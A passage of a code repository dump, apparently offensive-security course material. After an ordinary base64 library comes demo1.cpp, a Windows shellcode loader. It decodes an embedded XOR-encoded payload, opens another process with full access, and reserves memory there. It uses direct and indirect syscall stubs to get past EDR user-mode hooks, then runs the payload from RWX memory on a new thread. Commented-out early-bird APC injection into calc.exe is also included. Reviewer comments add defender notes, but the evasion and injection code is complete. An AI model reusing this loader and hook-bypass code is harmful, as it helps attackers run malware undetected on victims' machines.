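            if (pos + 2 < in_len) {
                // Characters 3 and 4: low 4 bits of byte 1 + top 2 bits of
                // byte 2, then the low 6 bits of byte 2.
                ret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);
                ret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);
            }
            else {
                // Two bytes in the last group: one padding character.
                ret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);
                ret.push_back(trailing_char);
            }
        }
        else {
            // One byte in the last group: two padding characters.
            ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);
            ret.push_back(trailing_char);
            ret.push_back(trailing_char);
        }

        pos += 3;
    }

    return ret;
}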
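//
// decode() is templated so that it can be used with String = const std::string&
// or std::string_view (requires at least C++17)
//
// Decodes text in either the standard or the URL-safe alphabet. '=' and
// '.' are both accepted as padding, and padding may be omitted (RFC 2045).
// Throws std::runtime_error for a character outside the alphabet and for a
// single dangling character at the end, which cannot encode any byte.
//
template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
    if (encoded_string.empty()) return std::string();

    if (remove_linebreaks) {
        // Strip '\n' into a private copy and decode that instead.
        std::string copy(encoded_string);

        copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());

        return base64_decode(copy, false);
    }

    size_t length_of_string = encoded_string.length();
    size_t pos = 0;

    //
    // The approximate length (bytes) of the decoded string might be one or
    // two bytes smaller, depending on the amount of trailing equal signs
    // in the encoded string. This approximation is needed to reserve
    // enough space in the string to be returned.
    //
    size_t approx_length_of_decoded_string = length_of_string / 4 * 3;
    std::string ret;
    ret.reserve(approx_length_of_decoded_string);

    while (pos < length_of_string) {
        //
        // Iterate over encoded input string in chunks. The size of all
        // chunks except the last one is 4 bytes.
        //
        // The last chunk might be padded with equal signs or dots
        // in order to make it 4 bytes in size as well, but this
        // is not required as per RFC 2045.
        //
        // All chunks except the last one produce three output bytes.
        //
        // The last chunk produces at least one and up to three bytes.
        //

        // A chunk needs at least two characters to yield its first byte.
        // Without this guard, encoded_string[pos + 1] was read unconditionally,
        // i.e. one past the end whenever length_of_string % 4 == 1 (truncated
        // or garbage input). Reject such input instead of reading past it.
        if (pos + 1 >= length_of_string) {
            throw std::runtime_error("Input is not valid base64-encoded data.");
        }

        size_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);

        //
        // Emit the first output byte that is produced in each chunk:
        //
        ret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));

        if ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)
            encoded_string[pos + 2] != '=' &&
            encoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.
            )
        {
            //
            // Emit a chunk's second byte (which might not be produced in the last chunk).
            //
            unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
            ret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));

            if ((pos + 3 < length_of_string) &&
                encoded_string[pos + 3] != '=' &&
                encoded_string[pos + 3] != '.'
                )
            {
                //
                // Emit a chunk's third byte (which might not be produced in the last chunk).
                //
                ret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
            }
        }

        pos += 4;
    }

    return ret;
}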
// Decode a std::string; with remove_linebreaks set, embedded '\n' are
// stripped first.
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
    const bool strip_newlines = remove_linebreaks;
    return decode(s, strip_newlines);
}
// Encode a std::string; `url` selects the URL-safe alphabet.
std::string base64_encode(std::string const& s, bool url) {
    const bool url_safe = url;
    return encode(s, url_safe);
}
// Encode a std::string and wrap the output at 64 characters (PEM).
std::string base64_encode_pem(std::string const& s) {
    std::string wrapped = encode_pem(s);
    return wrapped;
}
// Encode a std::string and wrap the output at 76 characters (MIME).
std::string base64_encode_mime(std::string const& s) {
    std::string wrapped = encode_mime(s);
    return wrapped;
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
// std::string_view overload of the encoder (C++17).
std::string base64_encode(std::string_view s, bool url) {
    const bool url_safe = url;
    return encode(s, url_safe);
}
// std::string_view overload of the PEM encoder (C++17).
std::string base64_encode_pem(std::string_view s) {
    std::string wrapped = encode_pem(s);
    return wrapped;
}
// std::string_view overload of the MIME encoder (C++17).
std::string base64_encode_mime(std::string_view s) {
    std::string wrapped = encode_mime(s);
    return wrapped;
}
// std::string_view overload of the decoder (C++17).
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
    const bool strip_newlines = remove_linebreaks;
    return decode(s, strip_newlines);
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo3/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
// Encode/decode a std::string. `url` selects the URL-safe alphabet ("-_",
// padded with '.'); remove_linebreaks strips '\n' before decoding.
std::string base64_encode(std::string const& s, bool url = false);
// Wrapped variants: PEM breaks lines at 64 characters, MIME at 76.
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
// Raw-byte overload; `len` bytes must be readable from the pointer.
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
// Same four operations taking a std::string_view instead of a std::string.
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo3/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
#include "nt.h"
using namespace std;
// Read the whole file `fnamSc` and return a heap buffer (new[]) holding its
// bytes XOR-ed with XOR_KEY; the file size is stored in *szSc.
// Returns nullptr if the file cannot be opened or read.
// NOTE(review): not called anywhere in this file. The file handle is never
// closed and `raw` is never freed, so every call leaks both; the nullptr
// return on ReadFile failure also leaks `sc`. The caller owns the returned
// buffer (delete[]).
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
    DWORD szRead{ 0 };
    // Opened with no share mode, so a concurrent open of the same file fails.
    HANDLE hFile = CreateFileA(
        fnamSc,
        GENERIC_READ,
        NULL,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (INVALID_HANDLE_VALUE == hFile)
        return nullptr;
    // Low 32 bits of the size only (the high-part pointer is NULL).
    SIZE_T szFile = GetFileSize(hFile, NULL);
    *szSc = szFile;
    unsigned char* raw = new unsigned char[szFile];
    unsigned char* sc = new unsigned char[szFile];
    if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
        return nullptr;
    int i;
    // Only the bytes actually read (szRead) are decoded; the rest of `sc`
    // stays uninitialised if the read was short.
    for (i = 0; i < szRead; i++) {
        sc[i] = raw[i] ^ XOR_KEY;
    }
    return sc;
}
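// Return a copy of `inStr` in which every non-overlapping occurrence of
// `pSrc` is replaced by `pReplace`, scanning left to right. Text produced
// by a replacement is not rescanned, so a `pReplace` containing `pSrc`
// cannot loop. An empty `pSrc` matches nothing and `inStr` comes back
// unchanged (the previous version looped forever on it). Both C strings
// must be non-null and NUL-terminated.
std::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)
{
    const std::string::size_type srcLen = strlen(pSrc);
    if (srcLen == 0)
    {
        return inStr;
    }
    const std::string::size_type replLen = strlen(pReplace);
    std::string str = inStr;
    // Work with offsets, not iterators: std::string::replace may reallocate,
    // which invalidated the iterator the previous version kept reusing.
    std::string::size_type pos = str.find(pSrc, 0);
    while (pos != std::string::npos)
    {
        str.replace(pos, srcLen, pReplace);
        // Resume just past the inserted text.
        pos = str.find(pSrc, pos + replLen);
    }
    return str;
}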
// Probe each candidate in VC_PREF_BASES and return the first one from which
// `cVmResv` consecutive regions of `szAllocGran` bytes are all MEM_FREE in
// process `hProc`; nullptr if no candidate qualifies. `szPage` is accepted
// but not used.
// NOTE(review): the return value of VirtualQueryEx is never checked, so
// `mbi` is read uninitialised when a query fails (e.g. an unusable handle).
// Defender note: a burst of VirtualQueryEx calls on a handle opened with
// PROCESS_ALL_ACCESS to another process is a typical precursor of
// cross-process allocation and is worth correlating with what follows.
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
    MEMORY_BASIC_INFORMATION mbi;
    for (auto base : VC_PREF_BASES) {
        VirtualQueryEx(
            hProc,
            base,
            &mbi,
            sizeof(MEMORY_BASIC_INFORMATION)
        );
        if (MEM_FREE == mbi.State) {
            uint64_t i;
            // Re-query each allocation-granularity step after the candidate.
            for (i = 0; i < cVmResv; ++i) {
                LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                VirtualQueryEx(
                    hProc,
                    currentBase,
                    &mbi,
                    sizeof(MEMORY_BASIC_INFORMATION)
                );
                if (MEM_FREE != mbi.State)
                    break;
            }
            // Only a full run of cVmResv free regions counts.
            if (i == cVmResv) {
                // found suitable base
                return base;
            }
        }
    }
    return nullptr;
}
#ifdef _M_IX86
// 32-bit build only. Return the value stored at fs:[0xC0] (the WOW32Reserved
// slot referred to in SC_Address); it is non-zero when a 32-bit process runs
// on a 64-bit OS, as local_is_wow64 below relies on.
EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
    return (PVOID)__readfsdword(0xC0);
}
// 32-bit build only. Return 1 when fs:[0xC0] is non-zero (the process is
// running under WOW64), else 0. Naked function: no prologue/epilogue, the
// result is left in EAX by the inline assembly.
__declspec(naked) BOOL local_is_wow64(void)
{
    __asm {
        mov eax, fs: [0xc0]
        test eax, eax
        jne wow64
        mov eax, 0
        ret
        wow64 :
        mov eax, 1
        ret
    }
}
#endif
// Code below is adapted from @modexpblog. Read linked article for more details.
// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
// Process-wide table of ntdll Zw* exports, filled lazily by
// SW3_PopulateSyscallList and read by the SW3_Get* lookups below.
SW3_SYSCALL_LIST SW3_SyscallList;
// SEARCH_AND_REPLACE
#ifdef SEARCH_AND_REPLACE
// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release
EXTERN void SearchAndReplace(unsigned char[], unsigned char[]);
#endif
// Hash an export name: starting from SW3_SEED, fold in a 16-bit window
// taken at every byte offset of the name (the window advances one byte per
// iteration, so the final window covers the last character and the NUL)
// combined with SW3_ROR8 of the running value. The hard-coded constant in
// nt.asm's NtCreateThreadEx PROC is presumably the hash of one export name
// under this seed - TODO confirm.
DWORD SW3_HashSyscall(PCSTR FunctionName)
{
    DWORD i = 0;
    DWORD Hash = SW3_SEED;
    while (FunctionName[i])
    {
        WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
        Hash ^= PartialName + SW3_ROR8(Hash);
    }
    return Hash;
}
#ifndef JUMPER
// Placeholder used when JUMPER is not defined: no syscall instruction is
// resolved, so every SW3_SyscallList entry ends up with SyscallAddress ==
// NULL and SW3_GetSyscallAddress always returns NULL.
PVOID SC_Address(PVOID NtApiAddress)
{
    return NULL;
}
#else
// JUMPER build. Given the address of an Nt* export, return the address of a
// `syscall; ret` (x64) or `sysenter; ret` (x86) byte sequence: first at the
// fixed offset distance_to_syscall inside that export, otherwise at the same
// offset inside neighbouring exports spaced 0x20 bytes apart, up to 512
// either side (the "HalosGate" fallback named in the comments). Returns NULL
// when nothing matches, and always NULL under WOW64 on 32-bit builds.
// Reads ntdll's code pages with memcmp; no API is called.
// Defender note: this is the indirect-syscall pattern that sidesteps
// user-mode prologue hooks, so detection has to come from kernel-side
// telemetry (syscalls whose return address is outside ntdll) rather than
// from hooks in the Nt* stubs themselves.
PVOID SC_Address(PVOID NtApiAddress)
{
    DWORD searchLimit = 512;
    PVOID SyscallAddress;

#ifdef _WIN64
    // If the process is 64-bit on a 64-bit OS, we need to search for syscall
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
    ULONG distance_to_syscall = 0x12;
#else
    // If the process is 32-bit on a 32-bit OS, we need to search for sysenter
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
    ULONG distance_to_syscall = 0x0f;
#endif

#ifdef _M_IX86
    // If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved
    if (local_is_wow64())
    {
#ifdef DEBUG
        printf("[+] Running 32-bit app on x64 (WOW64)\n");
#endif
        return NULL;
    }
#endif

    // we don't really care if there is a 'jmp' between
    // NtApiAddress and the 'syscall; ret' instructions
    SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);

    if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
    {
        // we can use the original code for this system call :)
#if defined(DEBUG)
        printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
        return SyscallAddress;
    }

    // the 'syscall; ret' intructions have not been found,
    // we will try to use one near it, similarly to HalosGate
    // Each step alternates one stub below and one stub above NtApiAddress.
    for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)
    {
        // let's try with an Nt* API below our syscall
        SyscallAddress = SW3_RVA2VA(
            PVOID,
            NtApiAddress,
            distance_to_syscall + num_jumps * 0x20);
        if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
        {
#if defined(DEBUG)
            printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
            return SyscallAddress;
        }

        // let's try with an Nt* API above our syscall
        SyscallAddress = SW3_RVA2VA(
            PVOID,
            NtApiAddress,
            distance_to_syscall - num_jumps * 0x20);
        if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
        {
#if defined(DEBUG)
            printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
            return SyscallAddress;
        }
    }

#ifdef DEBUG
    printf("Syscall Opcodes not found!\n");
#endif
    return NULL;
}
#endif
// Build SW3_SyscallList once: find ntdll by walking the loader module list
// from the PEB, collect every export whose name starts with "Zw", hash each
// name with SW3_HashSyscall, resolve a syscall instruction for it with
// SC_Address, then bubble-sort the entries by export RVA.
// SW3_GetSyscallNumber treats an entry's index in that sorted list as its
// syscall number.
// Returns FALSE only if no export directory was seen at all.
// NOTE(review): if no entry's export name matches "ntdll.dll", the loop runs
// off the end and the last module visited is processed instead.
// Defender note: this walk reads the PEB and image headers directly, so it
// generates no API-hook telemetry; the syscalls issued afterwards are the
// observable part.
BOOL SW3_PopulateSyscallList()
{
    // Return early if the list is already populated.
    if (SW3_SyscallList.Count) return TRUE;

    // PEB pointer from the TEB: gs:[0x60] on x64, fs:[0x30] on x86.
#ifdef _WIN64
    PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);
#else
    PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);
#endif
    PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;
    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
    PVOID DllBase = NULL;

    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
    // in the list, so it's safer to loop through the full list and find it.
    // The list is entered through Ldr->Reserved2[1] and followed via
    // LdrEntry->Reserved1[0] (see the partial struct layouts in nt.h) until
    // an entry with a NULL DllBase.
    PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;
    for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
    {
        DllBase = LdrEntry->DllBase;
        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
        PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (VirtualAddress == 0) continue;

        ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);

        // If this is NTDLL.dll, exit loop.
        // Case-insensitive compare of the export name: OR-ing 0x20 into each
        // byte lower-cases ASCII letters; 0x6c64746e is "ntdl" and
        // 0x6c642e6c is "l.dl" in little-endian byte order.
        PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);

        if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
    }

    if (!ExportDirectory) return FALSE;

    DWORD NumberOfNames = ExportDirectory->NumberOfNames;
    PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
    PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
    PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);

    // Populate SW3_SyscallList with unsorted Zw* entries.
    // Names are visited from the last one backwards.
    DWORD i = 0;
    PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;
    do
    {
        PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);

        // Is this a system call?
        // 0x775a is "Zw" read as a little-endian 16-bit value.
        if (*(USHORT*)FunctionName == 0x775a)
        {
            Entries[i].Hash = SW3_HashSyscall(FunctionName);
            Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
            Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));

            i++;
            // Stop once the fixed-size table is full.
            if (i == SW3_MAX_ENTRIES) break;
        }
    } while (--NumberOfNames);

    // Save total number of system calls found.
    SW3_SyscallList.Count = i;

    // Sort the list by address in ascending order.
    // Plain bubble sort; Count is at most SW3_MAX_ENTRIES so cost is bounded.
    for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)
    {
        for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)
        {
            if (Entries[j].Address > Entries[j + 1].Address)
            {
                // Swap entries.
                SW3_SYSCALL_ENTRY TempEntry;

                TempEntry.Hash = Entries[j].Hash;
                TempEntry.Address = Entries[j].Address;
                TempEntry.SyscallAddress = Entries[j].SyscallAddress;

                Entries[j].Hash = Entries[j + 1].Hash;
                Entries[j].Address = Entries[j + 1].Address;
                Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;

                Entries[j + 1].Hash = TempEntry.Hash;
                Entries[j + 1].Address = TempEntry.Address;
                Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;
            }
        }
    }

    return TRUE;
}
// Return the index of the entry whose Hash equals FunctionHash in the
// address-sorted SW3_SyscallList; that index is used as the syscall number
// by the stubs in nt.asm. Returns -1 (0xFFFFFFFF, since the return type is
// DWORD) when the list cannot be populated or the hash is not present - the
// caller in nt.asm does not check for that value.
EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
{
    // Ensure SW3_SyscallList is populated.
    if (!SW3_PopulateSyscallList()) return -1;

    // Linear scan; the table is unsorted with respect to Hash.
    for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
    {
        if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
        {
            return i;
        }
    }

    return -1;
}
// Return the SyscallAddress recorded for the entry whose Hash equals
// FunctionHash, or NULL if the list cannot be populated or the hash is
// absent. Without JUMPER every stored address is NULL (see SC_Address).
// Not referenced by main() or nt.asm in this listing.
EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
{
    // Ensure SW3_SyscallList is populated.
    if (!SW3_PopulateSyscallList()) return NULL;

    for (DWORD i = 0; i < SW3_SyscallList.Count; i++)
    {
        if (FunctionHash == SW3_SyscallList.Entries[i].Hash)
        {
            return SW3_SyscallList.Entries[i].SyscallAddress;
        }
    }

    return NULL;
}
// Return the SyscallAddress of a randomly chosen entry whose Hash differs
// from FunctionHash (the comment below calls this return-address spoofing).
// Returns NULL if the list cannot be populated. rand() is never seeded in
// this file, so the sequence of picks is the same on every run.
// Not referenced by main() or nt.asm in this listing.
EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
{
    // Ensure SW3_SyscallList is populated.
    if (!SW3_PopulateSyscallList()) return NULL;

    DWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;
    // Re-draw until the entry is not the one being looked up.
    while (FunctionHash == SW3_SyscallList.Entries[index].Hash) {
        // Spoofing the syscall return address
        index = ((DWORD)rand()) % SW3_SyscallList.Count;
    }
    return SW3_SyscallList.Entries[index].SyscallAddress;
}
// Entry point. As written, the sequence is:
//  1. Recover the payload: an embedded base64 blob (redacted in this
//     listing) whose "@@" marker is turned back into "==" by replace() and
//     decoded with base64_decode().
//  2. Open a process by the hard-coded PID 8696 with PROCESS_ALL_ACCESS and
//     reserve cVmResv regions of PAGE_NOACCESS memory in it through the
//     BNtAVM direct-syscall stub from nt.asm (presumably
//     NtAllocateVirtualMemory given the prototype). Neither hProc nor the
//     regions collected in vcVmResv are used again afterwards.
//  3. For each region index: XOR-decode one page of the payload with
//     XOR_KEY into `sc`, VirtualAlloc a PAGE_EXECUTE_READWRITE buffer in the
//     current process, memcpy into it, and start a thread on it through the
//     ANtCTE stub (nt.asm) with hard-coded per-build syscall numbers, then
//     wait for that thread.
// Several locals (all_tests_passed, cVmCmm, offsetSc, oldProt, prcDone,
// cmm_i) are declared but never used.
// Defender notes: the observable chain is OpenProcess(PROCESS_ALL_ACCESS)
// on a fixed PID, a cross-process allocation issued from a syscall
// instruction inside this image rather than ntdll, a local RWX allocation
// followed by a write, and thread creation by the same kind of stub. Each
// is commonly alerted on; the stubs also depend on syscall numbers that
// are only valid for the Windows builds labelled in nt.asm.
int main()
{
    bool all_tests_passed = false;
    // Payload text, redacted here; "@@" stands in for "==" padding.
    std::string rest2_reference = "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@@";
    std::string rest3_reference = replace(rest2_reference, "@@", "==");
    std::string rest2_decoded = base64_decode(rest3_reference);
    const char* S = rest2_decoded.c_str();

    // Hard-coded target PID; PROCESS_ALL_ACCESS on another process is a
    // high-signal event on its own.
    HANDLE hProc = OpenProcess(
        PROCESS_ALL_ACCESS,
        FALSE,
        8696
    );

    SYSTEM_INFO sys_inf;
    GetSystemInfo(&sys_inf);
    DWORD page_size{ sys_inf.dwPageSize };
    DWORD alloc_gran{ sys_inf.dwAllocationGranularity };
    SIZE_T szVmResv{ alloc_gran };
    SIZE_T szVmCmm{ page_size };
    // Number of allocation-granularity regions needed to cover the payload.
    DWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;
    DWORD cVmCmm = szVmResv / szVmCmm;

    LPVOID vmBaseAddress = GetSuitableBaseAddress(
        hProc,
        szVmCmm,
        szVmResv,
        cVmResv
    );

    LPVOID currentVmBase{ vmBaseAddress };
    NTSTATUS status{ 0 };
    vector<LPVOID> vcVmResv;

    //alloc memeory
    // Reserve (not commit) one region at a time in the target through the
    // direct-syscall stub; successes are remembered in vcVmResv.
    for (int i = 1; i <= cVmResv; ++i)
    {
        status = BNtAVM(
            hProc,
            ¤tVmBase, // presumably "&currentVmBase"; the "&curren" prefix was mangled in this listing
            NULL,
            &szVmResv,
            MEM_RESERVE,
            PAGE_NOACCESS
        );
        if (STATUS_SUCCESS == status) {
            vcVmResv.push_back(currentVmBase);
        }
        else {
            std::cout << "AVM error";
        }
        currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
    }

    DWORD offsetSc{ 0 };
    DWORD oldProt;
    double prcDone{ 0 };
    DWORD cmm_i;

    // Decode one page of the payload per iteration, stage it in a local RWX
    // buffer and run it on a new thread before moving to the next page.
    for (int i = 0; i < cVmResv; ++i)
    {
        unsigned char* sc = new unsigned char[szVmCmm];
        for (int j = 0; j < szVmCmm; j++) {
            //cout << szVmCmm * i + j << endl;
            sc[j] = S[szVmCmm * i + j] ^ XOR_KEY;
        }
        // Local RWX allocation: a classic memory-scanner and ETW signal.
        void* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, sc, rest2_decoded.length());
        //((void(*)())exec)();
        /*
        HANDLE hThread = CreateThread(
            NULL,
            0,
            (LPTHREAD_START_ROUTINE)exec,
            NULL,
            0,
            NULL);
        if (hThread == NULL)
        {
            return 1;
        }
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
        }*/
        /*
        CreateThread
        HANDLE hThread = CreateThread(
            NULL,
            0,
            (LPTHREAD_START_ROUTINE)exec,
            NULL,
            0,
            NULL);
        if (hThread == NULL)
        {
            return 1;
        }
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
        */
        //eariler bird APC
        /*
        SIZE_T shellSize = 4096;
        STARTUPINFOA si = { 0 };
        PROCESS_INFORMATION pi = { 0 };
        CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
        HANDLE victimProcess = pi.hProcess;
        HANDLE threadHandle = pi.hThread;
        LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
        WriteProcessMemory(victimProcess, shellAddress, exec, shellSize, NULL);
        QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
        ResumeThread(threadHandle);
        */
        //((void(*)())exec)();
        // Thread creation through the hard-coded-number stub in nt.asm,
        // targeting the current process; the status it returns is ignored.
        HANDLE hThread{ nullptr };
        ANtCTE(
            &hThread,
            THREAD_ALL_ACCESS,
            NULL,
            GetCurrentProcess(),
            (LPTHREAD_START_ROUTINE)exec,
            NULL,
            NULL,
            0,
            0,
            0,
            nullptr
        );
        WaitForSingleObject(hThread, INFINITE);
    }
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
